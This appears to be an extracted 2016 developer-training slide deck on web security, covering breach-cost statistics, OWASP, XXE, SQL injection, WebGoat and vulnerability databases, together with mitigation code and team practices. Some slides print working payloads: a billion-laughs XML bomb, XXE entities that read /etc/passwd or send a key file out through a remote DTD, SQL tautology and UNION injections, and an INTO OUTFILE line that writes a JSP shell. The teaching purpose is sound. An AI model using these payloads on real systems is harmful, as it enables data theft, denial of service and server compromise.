Ponemon IBM report. OWASP. WebGoat. Injections. XXE. Vulnerabilities database. Best practices.

1. WEB SECURITY
ROMAN TSYPUK
December 29, 2016

2. 2
AGENDA
1. Theory.
1. Ponemon IBM report keynotes.
2. OWASP.
2. Practice.
1. XXE vector attack demo.
2. XXE in details. How to fix it.
3. WebGoat overview. Demo.
4. SQL injection. Injection points.
5. JS MITM. Anonymous proxies.
3. Vulnerabilities database. How to scan your project.
4. Best practices for team and company.

3. 3
IBM and Ponemon Institute are pleased to release the 2016 Cost of Data
Breach Study: Global Analysis.
Ponemon Institute:
• provides strategic consulting to private
and public sector organizations
interested in establishing or enhancing
their privacy, data protection, and
security practices.
• conducts independent research on
privacy, data protection and information
security policy

4. 4
The average per capita cost of data breach over three years expressedin US dollars for 12 country studies.

5. 5
The total average cost of a data breachfor 12 countries in this year’s study, US$ millions

6. 6
Certain industries had higher data breach costs, US$

7. 7
Most data breaches were caused by malicious or criminal attacks.

8. 8
16 factors that decrease the cost of data breach

9. 9
According to research, the average total cost of a data breach for the
383 companies participating in this research increased from $3.79 to
$4 million.
The average cost paid for each lost or stolen record containing
sensitive and confidential information increased from $154 in 2015 to
$158 in this year’s study.
• 383 companies in 12 countries
• $4 million is the average total cost of data breach
• 29% increase in total cost of data breach since 2013
• $158 is the average cost per lost or stolen record
• 15%percent increase in per capita cost since 2013
PONEMON REPORT SUMMARY

10. 10
The Open Web Application Security Project (OWASP) is a worldwide free and
open community focused on improving the security of application software. Our
mission is to make application security “visible”, so that people and organizations
can make informed decisions about application security risks. Every one is free to
participate in OWASP and all of our materials are available under a free and open
software license.
Try to avoid using the guide as a checklist, new vulnerabilities are always
manifesting and no guide can be an exhaustive list of “things to test for”, but
rather a great place to start.

11. 11
Call to Action
If you’re building, designing or testing software, I strongly encourage you to get familiar with
the security testing guidance in this document. It is a great road map for testing the most
common issues facing applications today, but it is not exhaustive. If you find errors, please add
a note to the discussion page or make the change yourself. You’ll be helping thousands of
others who use this guide. Please consider joining us as an individual or corporate member so
that we can continue to produce materials like this testing guide and all the other great
projects at OWASP.
Several different roles within organizations that may use guide:
• Developers
• Software testers and QA
• Security specialists
• Project Managers

12. 12

13. 13
XXE
external entity
processing

14. 14
WEB
DB
XML
processor
XML PROCESSING SYSTEMS

15. 15
XXE DEMO

16. 16
<?xml version="1.0"?>
<!DOCTYPE message [
<!ELEMENT message (text)>
<!ELEMENT text (#PCDATA)>
<!ENTITY xxe "lol,">
<!ENTITY xxe2 "&xxe;&xxe;&xxe;&xxe;&xxe;&xxe;&xxe;&xxe;&xxe;&xxe;">
<!ENTITY xxe3 "&xxe2;&xxe2;&xxe2;&xxe2;&xxe2;&xxe2;&xxe2;&xxe2;&xxe2;&xxe2;">
<!ENTITY xxe4 "&xxe3;&xxe3;&xxe3;&xxe3;&xxe3;&xxe3;&xxe3;&xxe3;&xxe3;&xxe3;">
<!ENTITY xxe5 "&xxe4;&xxe4;&xxe4;&xxe4;&xxe4;&xxe4;&xxe4;&xxe4;&xxe4;&xxe4;">
<!ENTITY xxe6 "&xxe5;&xxe5;&xxe5;&xxe5;&xxe5;&xxe5;&xxe5;&xxe5;&xxe5;&xxe5;">
<!ENTITY xxe7 "&xxe6;&xxe6;&xxe6;&xxe6;&xxe6;&xxe6;&xxe6;&xxe6;&xxe6;&xxe6;">
<!ENTITY xxe8 "&xxe7;&xxe7;&xxe7;&xxe7;&xxe7;&xxe7;&xxe7;&xxe7;&xxe7;&xxe7;">
<!ENTITY xxe9 "&xxe8;&xxe8;&xxe8;&xxe8;&xxe8;&xxe8;&xxe8;&xxe8;&xxe8;&xxe8;">
]>
Billion laughs

17. 17
<?xml version="1.0"?>
<!DOCTYPE company [
<!ENTITY % xxe SYSTEM "http://127.0.0.1:8889">
%xxe;]>
<?xml version="1.0"?>
<!DOCTYPE order [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd" >
]>
<?xml version="1.0"?>
<!DOCTYPE order [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file://dev/random" >
]>
Local resource call with private IP
Get local file content
Random generator OOM

18. 18
<?xml version="1.0"?>
<!DOCTYPE company [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///etc/" >
]>
<?xml version="1.0"?>
<!DOCTYPE company [
<!ELEMENT text (#PCDATA)>
<!ENTITY xxe SYSTEM
"http://www.site.com/lohika.txt">
]>
Remote resource call
Local FS scan

19. 19
<?xml version="1.0"?>
<!DOCTYPE company [
<!ENTITY % file SYSTEM "file:///tmp/database.key" >
<!ENTITY % dtd SYSTEM "http://127.0.0.1:8080/evil2.dtd">
%dtd;
]>
<company>
<?xml version="1.0" encoding="UTF-8"?>
<!ENTITY % all "<!ENTITY send SYSTEM 'http://127.0.0.1:8888/load=%file;'>">
%all;
EVIL DTD
POISONED XML
Hijack resource
<staff id="1001">
<firstname>Homer</firstname>
<lastname>Simpson</lastname>
<nickname>nuclear</nickname>
<salary>1</salary>
<password>&send;</password>
</staff>

20. 20
INFRASTRUCTURE
FAKE DTD service
XML
processor
MQ
LDAP
App
server
DTD DTD
DTD DTD
POISONED
XML
Scan filesystem
Scan network
Triggering from private IP
DDOS private network
Memory/performance
HOST
XXE ATTACKS IN DETAILS
HTTP
server
FTP
server

21. 21
The eXtensible Markup Language (XML)
eXploitable Markup Language
Extensible Markup Language, abbreviated XML, describes a class of data objects called XML
documents and partially describes the behavior of computer programs which process them. XML
is an application profile or restricted form of SGML, the Standard Generalized Markup Language [ISO
8879]. By construction, XML documents are conforming SGML documents.
XML documents are made up of storage units called entities, which contain either parsed or
unparsed data. Parsed data is made up of characters, some of which form character data, and some of
which form markup. Markup encodes a description of the document's storage layout and logical
structure. XML provides a mechanism to impose constraints on the storage layout and logical structure.
[Definition: A software module called an XML processor is used to read XML documents and
provide access to their content and structure.] [Definition: It is assumed that an XML processor is
doing its work on behalf of another module, called the application.] This specification describes the
required behavior of an XML processor in terms of how it must read XML data and the information it must
provide to the application.
<, %, >, null-byte
no binary (must be UTF-8/16 data)

22. 22

23. 23
/**
* We do not allow external entities processing by setting up these flags:
*/
dbFactory.setFeature("http://xml.org/sax/features/external-general-entities", false);
dbFactory.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
/**
* XML Entity Expansion Injection (disable XML Bomb)
*/
dbFactory.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);

24. 24
FRAMEWORKS WE ARE USING
OUR OWN CODEBASE

25. 25
External entity processing is enabled by default in:
libxml2 php java .NET
file file file file
http http http/https http/https
ftp ftp ftp ftp
php jar
compress.zlib netdoc
Compress.bzip2 mailto
data gopher*
glob
phar

26. 26
WEBGOAT

27. 27
WEBGOAT DEMO

28. 28
SQL Injection vulnerabilities occur whenever input is used in the construction of a
SQL query without being adequately constrained or sanitized. The use of dynamic
SQL (the construction of SQL queries by concatenation of strings) opens the door
to these vulnerabilities.
MySQL comes with at least four versions which are used in production worldwide, 3.x,
4.x and 5.x. Every version has a set of features proportional to version number.
• From Version 4.0: UNION
• From Version 4.1: Subqueries
• From Version 5.0: Stored procedures, Stored functions and the view named
INFORMATION_SCHEMA
• From Version 5.0.2: Triggers

29. 29
Multiple mixed queries: MySQL library connectors do not support multiple queries
separated by ‘;’ so there’s no way to inject multiple non-homogeneous SQL
commands inside a single SQL injection vulnerability like in Microsoft SQL Server.
1 ; UPDATE TABLE_NAME SET code=’javascript code’ where 1 --
Fingerprinting MySQL
MySQL server has a feature that is used to let other DBMS ignore a clause in MySQL
dialect. When a comment block (‘/**/’) contains an exclamation mark (‘/*! sql
here*/’) it is interpreted by MySQL, and is considered as a normal comment block by
other DBMS as explained in MySQL manual.
1 /*! and 1=0 */

30. 30
Tautologies:
SELECT name from Table where username = ‘$_POST[username]’
AND
password = ‘$_POST[password]’
Username: inject’ OR 1=1
Password: inject’ OR 1=1
SELECT name from Table where username = ‘inject’
OR 1= 1 AND password = ‘inject’ OR 1=1
OR 1=1 transforms the entire WHERE clause into a tautology
Username: inject’ OR 1=1;/*
Password: */ --
SELECT name from Table where username = ‘inject’
OR 1= 1; /* AND password =‘*/ --’

31. 31
UNION Query:
SELECT name from Table where username = ‘$_POST[username]’
Username: inject’ UNION SELECT value FROM OTHER_TABLE WHERE ID =1’
SELECT name from Table where username = ‘inject’
UNION SELECT value FROM OTHER_TABLE WHERE ID =1
Return data from a table different than was intended by developer
1 AND 1=0 UNION SELECT DATABASE()
1 AND DATABASE() like ‘db%’
1 AND 1=0 UNION SELECT USER()
1 AND USER() like ‘root%’
1 AND 1=0 UNION SELECT @@version /*

32. 32
Write into file:
1 LIMIT 1 into OUTFILE ‘/var/www/root/test.jsp’ FIELDS ENCLOSED BY ‘/’ LINES TERMINATED BY ‘n<%jsp code here%>’;
Results are stored in a file with rw-rw-rw privileges owned by MySQL
user and group.
Where /var/www/root/test.jsp will contain:
/field values/
<%jsp code here%>
select load_file('/etc/passwd');
Read from a File
load_file is a native function that can read a file when allowed by the
file system permissions. If a connected user has FILE privileges, it could
be used to get the files’ content.
load_file(‘filename’)
Out of band SQL Injection
Out of band injection could be accomplished by using the ‘into out- file’ clause.

33. 33
param values in URL
<link> element with
params
HTTP request HEADERs
<input type=“hidden”>
<form>
…
<input type=“text”>
INJECTION POINTS

34. 34
Chema Alonso
JS MITM

35. 35
Vulnerability Data Source
• National Vulnerability Database
(NVD) – https://nvd.nist.gov
• Contains a listing of Common
Vulnerability and Exposures (CVE)
• Each CVE entry contains
– A description of the vulnerability or
exposure
– A Common Vulnerability Scoring
System (CVSS) score
– A list of the affected platforms
identified by their Common Platform
Enumeration (CPE)
VULNERABILITIES DATABASE
org.owasp.dependency-check

36. 36
Update code review check list.
Share with your team OWASP10
as a start source of knowledge.
Use automation tools.
Discuss the issues.
Manual review.
Create security trainings.
Own the penetration testers and experts.
Periodically do assessments of projects.
Education / Conferences / Certification

37. IBM Ponemon report http://www.ibm.com/security/data-breach/
OWASP TOP 10 https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project
XML specification https://www.w3.org/TR/REC-xml/#sec-external-ent
DefCon Alonso’s materials https://www.defcon.org/html/links/dc-archives/dc-20-archive.html#Alonso
WebGoat https://github.com/WebGoat/WebGoat/releases
OWASP dependency check https://www.owasp.org/index.php/OWASP_Dependency_Check
Vulnerabilities DB http://nvd.nist.gov
USEFUL LINKS

38. 38
C
C
C
QUESTIONS ???